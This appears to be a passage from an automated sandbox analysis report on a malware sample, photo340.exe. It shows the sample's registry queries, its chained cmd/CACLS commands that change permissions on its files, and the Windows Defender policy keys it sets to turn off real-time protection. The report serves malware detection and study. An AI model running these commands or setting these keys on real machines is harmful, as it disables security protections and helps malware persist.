RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000002c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000002c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW July 27, 2023, 10:25 a.m.	key_handle: 0x000002c0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1

Uses suspicious command line tools or Windows utilities (6 events)

cmdline	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "pdates.exe" /P "test22:N"&&CACLS "pdates.exe" /P "test22:R" /E&&echo Y\|CACLS "..\925e7e99c5" /P "test22:N"&&CACLS "..\925e7e99c5" /P "test22:R" /E&&Exit
cmdline	cmd /k echo Y\|CACLS "pdates.exe" /P "test22:N"&&CACLS "pdates.exe" /P "test22:R" /E&&echo Y\|CACLS "..\925e7e99c5" /P "test22:N"&&CACLS "..\925e7e99c5" /P "test22:R" /E&&Exit
cmdline	CACLS "..\925e7e99c5" /P "test22:R" /E
cmdline	CACLS "..\925e7e99c5" /P "test22:N"
cmdline	CACLS "pdates.exe" /P "test22:N"
cmdline	CACLS "pdates.exe" /P "test22:R" /E

Disables Windows Security features (6 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection

photo340.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All